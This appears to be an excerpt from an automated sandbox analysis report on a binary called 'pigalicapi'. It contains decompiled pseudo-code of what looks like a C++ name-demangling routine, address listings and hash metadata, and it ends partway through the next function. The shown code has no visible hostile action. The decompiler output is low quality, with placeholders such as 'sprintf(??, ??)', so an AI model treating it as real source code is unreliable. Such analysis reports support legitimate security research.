                                                                                                                                                                                                                                                                                                        				signed char* _t170;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t172;
                                                                                                                                                                                                                                                                                                        				signed char* _t173;
                                                                                                                                                                                                                                                                                                        				void* _t174;
                                                                                                                                                                                                                                                                                                        				signed char** _t175;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t104 = __eax;
                                                                                                                                                                                                                                                                                                        				_t137 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t175 = _t174 - 0x4c;
                                                                                                                                                                                                                                                                                                        				_t175[5] = __edx;
                                                                                                                                                                                                                                                                                                        				_t170 = _t175[0x18];
                                                                                                                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					return _t104;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t169 = __eax;
                                                                                                                                                                                                                                                                                                        					_t104 =  *(__eax + 0x118);
                                                                                                                                                                                                                                                                                                        					if(_t104 == 0) {
                                                                                                                                                                                                                                                                                                        						do {
                                                                                                                                                                                                                                                                                                        							if(_t137[8] != 0) {
                                                                                                                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                                                                                                                        								_t137 =  *_t137;
                                                                                                                                                                                                                                                                                                        								if(_t137 != 0) {
                                                                                                                                                                                                                                                                                                        									goto L3;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t143 = _t137[4];
                                                                                                                                                                                                                                                                                                        								_t104 =  *(_t137[4]);
                                                                                                                                                                                                                                                                                                        								if(_t170 != 0 || _t104 - 0x1c > 4) {
                                                                                                                                                                                                                                                                                                        									_t137[8] = 1;
                                                                                                                                                                                                                                                                                                        									_t167 = _t169[0x110];
                                                                                                                                                                                                                                                                                                        									_t169[0x110] = _t137[0xc];
                                                                                                                                                                                                                                                                                                        									if(_t104 == 0x29) {
                                                                                                                                                                                                                                                                                                        										 *_t175 =  *_t137;
                                                                                                                                                                                                                                                                                                        										_t107 = E0040BE20(_t169, _t143 + 8, _t175[5]);
                                                                                                                                                                                                                                                                                                        										_t169[0x110] = _t167;
                                                                                                                                                                                                                                                                                                        										return _t107;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										if(_t104 == 0x2a) {
                                                                                                                                                                                                                                                                                                        											 *_t175 =  *_t137;
                                                                                                                                                                                                                                                                                                        											_t110 = E0040BBA0(_t169, _t143 + 4, _t175[5]);
                                                                                                                                                                                                                                                                                                        											_t169[0x110] = _t167;
                                                                                                                                                                                                                                                                                                        											return _t110;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											if(_t104 == 2) {
                                                                                                                                                                                                                                                                                                        												_t169[0x114] = 0;
                                                                                                                                                                                                                                                                                                        												E0040B090(_t169,  *((intOrPtr*)(_t143 + 4)), _t175[5]);
                                                                                                                                                                                                                                                                                                        												_t113 = _t169[0x100];
                                                                                                                                                                                                                                                                                                        												if((_t175[5] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        													if(_t113 == 0xff) {
                                                                                                                                                                                                                                                                                                        														_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        														_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        														 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        														_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        														_t169[0x108]();
                                                                                                                                                                                                                                                                                                        														_t159 = 1;
                                                                                                                                                                                                                                                                                                        														_t113 = 0;
                                                                                                                                                                                                                                                                                                        														_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														_t159 = _t113 + 1;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t169[0x100] = _t159;
                                                                                                                                                                                                                                                                                                        													_t169[_t113] = 0x2e;
                                                                                                                                                                                                                                                                                                        													_t169[0x104] = 0x2e;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													_t173 = 0x41fa44;
                                                                                                                                                                                                                                                                                                        													_t175[6] = _t137;
                                                                                                                                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                                                                                                                                        														_t141 =  *_t173 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        														if(_t113 != 0xff) {
                                                                                                                                                                                                                                                                                                        															_t153 = _t113 + 1;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        															_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        															 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        															_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        															_t169[0x108]();
                                                                                                                                                                                                                                                                                                        															_t153 = 1;
                                                                                                                                                                                                                                                                                                        															_t113 = 0;
                                                                                                                                                                                                                                                                                                        															_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t173 =  &(_t173[1]);
                                                                                                                                                                                                                                                                                                        														_t169[0x100] = _t153;
                                                                                                                                                                                                                                                                                                        														_t169[_t113] = _t141;
                                                                                                                                                                                                                                                                                                        														_t169[0x104] = _t141;
                                                                                                                                                                                                                                                                                                        														if(_t173 == 0x41fa46) {
                                                                                                                                                                                                                                                                                                        															break;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t113 = _t153;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t137 = _t175[6];
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												_t172 =  *((intOrPtr*)(_t137[4] + 8));
                                                                                                                                                                                                                                                                                                        												_t117 =  *_t172;
                                                                                                                                                                                                                                                                                                        												if(_t117 == 0x45) {
                                                                                                                                                                                                                                                                                                        													_t121 = _t169[0x100];
                                                                                                                                                                                                                                                                                                        													_t138 = "{default arg#";
                                                                                                                                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                                                                                                                                        														_t161 =  *_t138 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        														if(_t121 != 0xff) {
                                                                                                                                                                                                                                                                                                        															_t149 = _t121 + 1;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        															_t175[6] = _t161;
                                                                                                                                                                                                                                                                                                        															_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        															_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        															 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        															_t169[0x108]();
                                                                                                                                                                                                                                                                                                        															_t149 = 1;
                                                                                                                                                                                                                                                                                                        															_t121 = 0;
                                                                                                                                                                                                                                                                                                        															_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        															_t161 = _t175[6];
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t138 =  &(_t138[1]);
                                                                                                                                                                                                                                                                                                        														_t169[0x100] = _t149;
                                                                                                                                                                                                                                                                                                        														_t169[_t121] = _t161;
                                                                                                                                                                                                                                                                                                        														_t169[0x104] = _t161;
                                                                                                                                                                                                                                                                                                        														if(_t138 == 0x41fa54) {
                                                                                                                                                                                                                                                                                                        															break;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t121 = _t149;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t139 =  &(_t175[9]);
                                                                                                                                                                                                                                                                                                        													_t175[1] = "%ld";
                                                                                                                                                                                                                                                                                                        													 *_t175 = _t139;
                                                                                                                                                                                                                                                                                                        													_t175[2] =  *((intOrPtr*)(_t172 + 8)) + 1;
                                                                                                                                                                                                                                                                                                        													sprintf(??, ??);
                                                                                                                                                                                                                                                                                                        													 *_t175 = _t139;
                                                                                                                                                                                                                                                                                                        													_t125 = strlen(??);
                                                                                                                                                                                                                                                                                                        													if(_t125 == 0) {
                                                                                                                                                                                                                                                                                                        														_t126 = _t169[0x100];
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														_t163 = _t169[0x100];
                                                                                                                                                                                                                                                                                                        														_t175[6] = _t167;
                                                                                                                                                                                                                                                                                                        														_t168 =  &(_t139[_t125]);
                                                                                                                                                                                                                                                                                                        														while(1) {
                                                                                                                                                                                                                                                                                                        															_t152 =  *_t139 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        															if(_t163 != 0xff) {
                                                                                                                                                                                                                                                                                                        																_t126 = _t163 + 1;
                                                                                                                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                                                                                                                        																_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        																_t175[7] = _t152;
                                                                                                                                                                                                                                                                                                        																_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        																_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        																 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        																_t169[0x108]();
                                                                                                                                                                                                                                                                                                        																_t126 = 1;
                                                                                                                                                                                                                                                                                                        																_t163 = 0;
                                                                                                                                                                                                                                                                                                        																_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        																_t152 = _t175[7];
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															_t139 =  &(_t139[1]);
                                                                                                                                                                                                                                                                                                        															_t169[0x100] = _t126;
                                                                                                                                                                                                                                                                                                        															_t169[_t163] = _t152;
                                                                                                                                                                                                                                                                                                        															_t169[0x104] = _t152;
                                                                                                                                                                                                                                                                                                        															if(_t139 == _t168) {
                                                                                                                                                                                                                                                                                                        																break;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															_t163 = _t126;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t167 = _t175[6];
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t140 = "}::";
                                                                                                                                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                                                                                                                                        														_t162 =  *_t140 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        														if(_t126 != 0xff) {
                                                                                                                                                                                                                                                                                                        															_t151 = _t126 + 1;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        															_t175[6] = _t162;
                                                                                                                                                                                                                                                                                                        															_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        															_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        															 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        															_t169[0x108]();
                                                                                                                                                                                                                                                                                                        															_t151 = 1;
                                                                                                                                                                                                                                                                                                        															_t126 = 0;
                                                                                                                                                                                                                                                                                                        															_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        															_t162 = _t175[6];
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t140 =  &(_t140[1]);
                                                                                                                                                                                                                                                                                                        														_t169[0x100] = _t151;
                                                                                                                                                                                                                                                                                                        														_t169[_t126] = _t162;
                                                                                                                                                                                                                                                                                                        														_t169[0x104] = _t162;
                                                                                                                                                                                                                                                                                                        														if(_t140 == 0x41fa5c) {
                                                                                                                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                                                                                                                        															_t172 =  *((intOrPtr*)(_t172 + 4));
                                                                                                                                                                                                                                                                                                        															_t117 =  *_t172;
                                                                                                                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t126 = _t151;
                                                                                                                                                                                                                                                                                                        															continue;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														L30:
                                                                                                                                                                                                                                                                                                        														_t120 = E0040B090(_t169, _t172, _t175[5]);
                                                                                                                                                                                                                                                                                                        														_t169[0x110] = _t167;
                                                                                                                                                                                                                                                                                                        														return _t120;
                                                                                                                                                                                                                                                                                                        														goto L53;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												L29:
                                                                                                                                                                                                                                                                                                        												if(_t117 - 0x1c <= 4) {
                                                                                                                                                                                                                                                                                                        													goto L28;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												_t104 = E0040B0B0(_t169, _t143, _t175[5]);
                                                                                                                                                                                                                                                                                                        												_t169[0x110] = _t167;
                                                                                                                                                                                                                                                                                                        												goto L11;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L11;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L53;
                                                                                                                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                                                                                                                        							_t104 = _t169[0x118];
                                                                                                                                                                                                                                                                                                        						} while (_t104 == 0);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L53:
                                                                                                                                                                                                                                                                                                        			}

































                                                                                                                                                                                                                                                                                                        0x0040b820
                                                                                                                                                                                                                                                                                                        0x0040b824
                                                                                                                                                                                                                                                                                                        0x0040b826
                                                                                                                                                                                                                                                                                                        0x0040b82b
                                                                                                                                                                                                                                                                                                        0x0040b82f
                                                                                                                                                                                                                                                                                                        0x0040b833
                                                                                                                                                                                                                                                                                                        0x0040b8a1
                                                                                                                                                                                                                                                                                                        0x0040b8a8
                                                                                                                                                                                                                                                                                                        0x0040b835
                                                                                                                                                                                                                                                                                                        0x0040b835
                                                                                                                                                                                                                                                                                                        0x0040b837
                                                                                                                                                                                                                                                                                                        0x0040b83f
                                                                                                                                                                                                                                                                                                        0x0040b84d
                                                                                                                                                                                                                                                                                                        0x0040b852
                                                                                                                                                                                                                                                                                                        0x0040b89b
                                                                                                                                                                                                                                                                                                        0x0040b89b
                                                                                                                                                                                                                                                                                                        0x0040b89f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b854
                                                                                                                                                                                                                                                                                                        0x0040b854
                                                                                                                                                                                                                                                                                                        0x0040b859
                                                                                                                                                                                                                                                                                                        0x0040b85b
                                                                                                                                                                                                                                                                                                        0x0040b86b
                                                                                                                                                                                                                                                                                                        0x0040b872
                                                                                                                                                                                                                                                                                                        0x0040b878
                                                                                                                                                                                                                                                                                                        0x0040b87e
                                                                                                                                                                                                                                                                                                        0x0040b8b2
                                                                                                                                                                                                                                                                                                        0x0040b8b7
                                                                                                                                                                                                                                                                                                        0x0040b8bc
                                                                                                                                                                                                                                                                                                        0x0040b8c9
                                                                                                                                                                                                                                                                                                        0x0040b880
                                                                                                                                                                                                                                                                                                        0x0040b883
                                                                                                                                                                                                                                                                                                        0x0040b8d3
                                                                                                                                                                                                                                                                                                        0x0040b8d8
                                                                                                                                                                                                                                                                                                        0x0040b8dd
                                                                                                                                                                                                                                                                                                        0x0040b8ea
                                                                                                                                                                                                                                                                                                        0x0040b885
                                                                                                                                                                                                                                                                                                        0x0040b888
                                                                                                                                                                                                                                                                                                        0x0040b8f3
                                                                                                                                                                                                                                                                                                        0x0040b904
                                                                                                                                                                                                                                                                                                        0x0040b909
                                                                                                                                                                                                                                                                                                        0x0040b91a
                                                                                                                                                                                                                                                                                                        0x0040b988
                                                                                                                                                                                                                                                                                                        0x0040b9e3
                                                                                                                                                                                                                                                                                                        0x0040b9ea
                                                                                                                                                                                                                                                                                                        0x0040b9f2
                                                                                                                                                                                                                                                                                                        0x0040b9f5
                                                                                                                                                                                                                                                                                                        0x0040b9f9
                                                                                                                                                                                                                                                                                                        0x0040b9ff
                                                                                                                                                                                                                                                                                                        0x0040ba04
                                                                                                                                                                                                                                                                                                        0x0040ba06
                                                                                                                                                                                                                                                                                                        0x0040b98a
                                                                                                                                                                                                                                                                                                        0x0040b98a
                                                                                                                                                                                                                                                                                                        0x0040b98a
                                                                                                                                                                                                                                                                                                        0x0040b98d
                                                                                                                                                                                                                                                                                                        0x0040b993
                                                                                                                                                                                                                                                                                                        0x0040b997
                                                                                                                                                                                                                                                                                                        0x0040b91c
                                                                                                                                                                                                                                                                                                        0x0040b91c
                                                                                                                                                                                                                                                                                                        0x0040b921
                                                                                                                                                                                                                                                                                                        0x0040b946
                                                                                                                                                                                                                                                                                                        0x0040b94b
                                                                                                                                                                                                                                                                                                        0x0040b94f
                                                                                                                                                                                                                                                                                                        0x0040b927
                                                                                                                                                                                                                                                                                                        0x0040b951
                                                                                                                                                                                                                                                                                                        0x0040b957
                                                                                                                                                                                                                                                                                                        0x0040b95e
                                                                                                                                                                                                                                                                                                        0x0040b966
                                                                                                                                                                                                                                                                                                        0x0040b969
                                                                                                                                                                                                                                                                                                        0x0040b96d
                                                                                                                                                                                                                                                                                                        0x0040b973
                                                                                                                                                                                                                                                                                                        0x0040b978
                                                                                                                                                                                                                                                                                                        0x0040b97a
                                                                                                                                                                                                                                                                                                        0x0040b97a
                                                                                                                                                                                                                                                                                                        0x0040b92a
                                                                                                                                                                                                                                                                                                        0x0040b933
                                                                                                                                                                                                                                                                                                        0x0040b939
                                                                                                                                                                                                                                                                                                        0x0040b93c
                                                                                                                                                                                                                                                                                                        0x0040b942
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b944
                                                                                                                                                                                                                                                                                                        0x0040b944
                                                                                                                                                                                                                                                                                                        0x0040b9a0
                                                                                                                                                                                                                                                                                                        0x0040b9a0
                                                                                                                                                                                                                                                                                                        0x0040b9a7
                                                                                                                                                                                                                                                                                                        0x0040b9aa
                                                                                                                                                                                                                                                                                                        0x0040b9b0
                                                                                                                                                                                                                                                                                                        0x0040ba17
                                                                                                                                                                                                                                                                                                        0x0040ba1d
                                                                                                                                                                                                                                                                                                        0x0040ba40
                                                                                                                                                                                                                                                                                                        0x0040ba45
                                                                                                                                                                                                                                                                                                        0x0040ba48
                                                                                                                                                                                                                                                                                                        0x0040ba21
                                                                                                                                                                                                                                                                                                        0x0040ba4a
                                                                                                                                                                                                                                                                                                        0x0040ba50
                                                                                                                                                                                                                                                                                                        0x0040ba57
                                                                                                                                                                                                                                                                                                        0x0040ba5b
                                                                                                                                                                                                                                                                                                        0x0040ba63
                                                                                                                                                                                                                                                                                                        0x0040ba67
                                                                                                                                                                                                                                                                                                        0x0040ba6a
                                                                                                                                                                                                                                                                                                        0x0040ba70
                                                                                                                                                                                                                                                                                                        0x0040ba75
                                                                                                                                                                                                                                                                                                        0x0040ba77
                                                                                                                                                                                                                                                                                                        0x0040ba7e
                                                                                                                                                                                                                                                                                                        0x0040ba7e
                                                                                                                                                                                                                                                                                                        0x0040ba24
                                                                                                                                                                                                                                                                                                        0x0040ba2d
                                                                                                                                                                                                                                                                                                        0x0040ba33
                                                                                                                                                                                                                                                                                                        0x0040ba36
                                                                                                                                                                                                                                                                                                        0x0040ba3c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040ba3e
                                                                                                                                                                                                                                                                                                        0x0040ba3e
                                                                                                                                                                                                                                                                                                        0x0040ba87
                                                                                                                                                                                                                                                                                                        0x0040ba8b
                                                                                                                                                                                                                                                                                                        0x0040ba93
                                                                                                                                                                                                                                                                                                        0x0040ba99
                                                                                                                                                                                                                                                                                                        0x0040ba9d
                                                                                                                                                                                                                                                                                                        0x0040baa2
                                                                                                                                                                                                                                                                                                        0x0040baa5
                                                                                                                                                                                                                                                                                                        0x0040baac
                                                                                                                                                                                                                                                                                                        0x0040bb96
                                                                                                                                                                                                                                                                                                        0x0040bab2
                                                                                                                                                                                                                                                                                                        0x0040bab4
                                                                                                                                                                                                                                                                                                        0x0040baba
                                                                                                                                                                                                                                                                                                        0x0040babe
                                                                                                                                                                                                                                                                                                        0x0040badd
                                                                                                                                                                                                                                                                                                        0x0040bae3
                                                                                                                                                                                                                                                                                                        0x0040bae6
                                                                                                                                                                                                                                                                                                        0x0040bac2
                                                                                                                                                                                                                                                                                                        0x0040bae8
                                                                                                                                                                                                                                                                                                        0x0040baee
                                                                                                                                                                                                                                                                                                        0x0040baf5
                                                                                                                                                                                                                                                                                                        0x0040baf9
                                                                                                                                                                                                                                                                                                        0x0040bb01
                                                                                                                                                                                                                                                                                                        0x0040bb05
                                                                                                                                                                                                                                                                                                        0x0040bb08
                                                                                                                                                                                                                                                                                                        0x0040bb0e
                                                                                                                                                                                                                                                                                                        0x0040bb13
                                                                                                                                                                                                                                                                                                        0x0040bb15
                                                                                                                                                                                                                                                                                                        0x0040bb1c
                                                                                                                                                                                                                                                                                                        0x0040bb1c
                                                                                                                                                                                                                                                                                                        0x0040bac5
                                                                                                                                                                                                                                                                                                        0x0040baca
                                                                                                                                                                                                                                                                                                        0x0040bad0
                                                                                                                                                                                                                                                                                                        0x0040bad3
                                                                                                                                                                                                                                                                                                        0x0040bad9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040badb
                                                                                                                                                                                                                                                                                                        0x0040badb
                                                                                                                                                                                                                                                                                                        0x0040bb22
                                                                                                                                                                                                                                                                                                        0x0040bb22
                                                                                                                                                                                                                                                                                                        0x0040bb2b
                                                                                                                                                                                                                                                                                                        0x0040bb52
                                                                                                                                                                                                                                                                                                        0x0040bb57
                                                                                                                                                                                                                                                                                                        0x0040bb5a
                                                                                                                                                                                                                                                                                                        0x0040bb2f
                                                                                                                                                                                                                                                                                                        0x0040bb5c
                                                                                                                                                                                                                                                                                                        0x0040bb62
                                                                                                                                                                                                                                                                                                        0x0040bb69
                                                                                                                                                                                                                                                                                                        0x0040bb6d
                                                                                                                                                                                                                                                                                                        0x0040bb75
                                                                                                                                                                                                                                                                                                        0x0040bb79
                                                                                                                                                                                                                                                                                                        0x0040bb7c
                                                                                                                                                                                                                                                                                                        0x0040bb82
                                                                                                                                                                                                                                                                                                        0x0040bb87
                                                                                                                                                                                                                                                                                                        0x0040bb89
                                                                                                                                                                                                                                                                                                        0x0040bb90
                                                                                                                                                                                                                                                                                                        0x0040bb90
                                                                                                                                                                                                                                                                                                        0x0040bb32
                                                                                                                                                                                                                                                                                                        0x0040bb3b
                                                                                                                                                                                                                                                                                                        0x0040bb41
                                                                                                                                                                                                                                                                                                        0x0040bb44
                                                                                                                                                                                                                                                                                                        0x0040bb4a
                                                                                                                                                                                                                                                                                                        0x0040b9b4
                                                                                                                                                                                                                                                                                                        0x0040b9b4
                                                                                                                                                                                                                                                                                                        0x0040b9b7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040bb50
                                                                                                                                                                                                                                                                                                        0x0040bb50
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040bb50
                                                                                                                                                                                                                                                                                                        0x0040b9c2
                                                                                                                                                                                                                                                                                                        0x0040b9ca
                                                                                                                                                                                                                                                                                                        0x0040b9cf
                                                                                                                                                                                                                                                                                                        0x0040b9dc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b9dc
                                                                                                                                                                                                                                                                                                        0x0040bb52
                                                                                                                                                                                                                                                                                                        0x0040b9ba
                                                                                                                                                                                                                                                                                                        0x0040b9c0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b88a
                                                                                                                                                                                                                                                                                                        0x0040b890
                                                                                                                                                                                                                                                                                                        0x0040b895
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b895
                                                                                                                                                                                                                                                                                                        0x0040b888
                                                                                                                                                                                                                                                                                                        0x0040b883
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b85b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b843
                                                                                                                                                                                                                                                                                                        0x0040b843
                                                                                                                                                                                                                                                                                                        0x0040b849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b841
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b83f
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: {default arg#$}::
                                                                                                                                                                                                                                                                                                        • API String ID: 0-3706473490
                                                                                                                                                                                                                                                                                                        • Opcode ID: f6a5695efae2835f33b0a44589fd0ae4fef321bba4350e7326e33b460c672c70
                                                                                                                                                                                                                                                                                                        • Instruction ID: f4f608b1dceb6418645120ccea16dd4763757164fdb04872707e84549da8f2de
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6a5695efae2835f33b0a44589fd0ae4fef321bba4350e7326e33b460c672c70
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28A15370608741CBC725DF28C0847ABBBE1EF94304F14883EE5DA9B341D779A885DB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                                                                                                                                                        			E00412EC0(signed int __ecx, void* __edx, void* __edi, char* _a4, signed int _a8) {
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				char* _v24;
                                                                                                                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				char* _v56;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				char* _t46;
                                                                                                                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                                                                                                                        				char* _t49;
                                                                                                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                                                                                                        				char* _t52;
                                                                                                                                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                                                                                                                        				char* _t56;
                                                                                                                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                                                                                                                        				char* _t71;
                                                                                                                                                                                                                                                                                                        				long _t77;
                                                                                                                                                                                                                                                                                                        				char* _t78;
                                                                                                                                                                                                                                                                                                        				char* _t81;
                                                                                                                                                                                                                                                                                                        				void* _t84;
